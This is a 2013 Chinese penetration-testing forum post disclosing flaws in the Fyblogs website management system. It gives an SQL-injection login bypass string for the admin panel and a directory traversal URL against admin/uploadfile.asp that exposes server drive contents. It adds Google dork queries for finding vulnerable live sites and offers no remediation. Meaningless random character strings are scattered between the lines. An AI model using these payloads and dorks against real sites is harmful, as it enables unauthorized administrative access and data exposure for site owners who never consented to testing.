中国网络渗透测试联盟
标题:
Fyblogs网站管理系统漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:17
标题:
Fyblogs网站管理系统漏洞
后台万能密码 'or'='or'
% ?# G4 Z8 f) C: p' z
9 ^3 z4 O! ` W% l7 ~, B. ?
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
" r3 @4 u: Q2 F6 }8 M
admin/uploadfile.asp?currentFolder=/upfiles/../
* v$ E8 s( H# o$ S2 y
# g# \' E, j# Z6 J+ W
漏洞证明:
: f* Z2 I$ H; s4 T8 J
* J+ _. C- Q" |% d. D; v. s( z
谷歌:inurl:type.asp?id=1 新闻中心
3 C3 Y A$ ]* r- H
或者 :inurl:download_ok.asp?
% n2 u6 p: h% Z# d0 _$ i7 r
9 L7 W0 R) ^; m+ k1 r2 {
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2